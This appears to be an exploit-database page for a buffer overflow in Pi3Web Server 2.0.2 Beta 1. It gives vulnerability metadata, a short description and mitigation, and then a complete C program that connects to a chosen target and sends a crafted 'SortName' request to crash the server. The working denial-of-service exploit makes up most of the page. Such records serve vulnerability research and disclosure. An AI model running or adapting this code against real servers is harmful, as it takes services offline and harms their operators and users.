Pi3Web Buffer Overflow Vulnerability

vendor:

Pi3Web Server

by:

posidron

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Pi3Web Server

Affected Version From: 2.0.2 Beta 1

Affected Version To: 2.0.2 Beta 1

Patch Exists: NO

Related CWE: N/A

CPE: a:pi3web:pi3web_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2003

Pi3Web Buffer Overflow Vulnerability

Pi3Web is prone to a buffer overflow vulnerability due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

Mitigation:

Input validation should be used to prevent buffer overflow attacks.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7787/info

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms. 

/*********************************************************************
*
*     Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
*    Tripbit Security Development
*    ----------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*       [-] IRC: irc.euirc.net 6667 #tripbit
*
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
*     Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;

    char sendstring[1024];

    strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n",argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
    {
        printf("Can't start socket()!\n");
        exit(0);
    }

    if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
    {
        printf("Can't connect!\n");
        exit(0);
    }

    printf("Dos against Pi3 Web Server v2.0.2\n");

    write(sockfd,sendstring,strlen(sendstring));

    printf("Attack done!...\n");

    close(sockfd);
}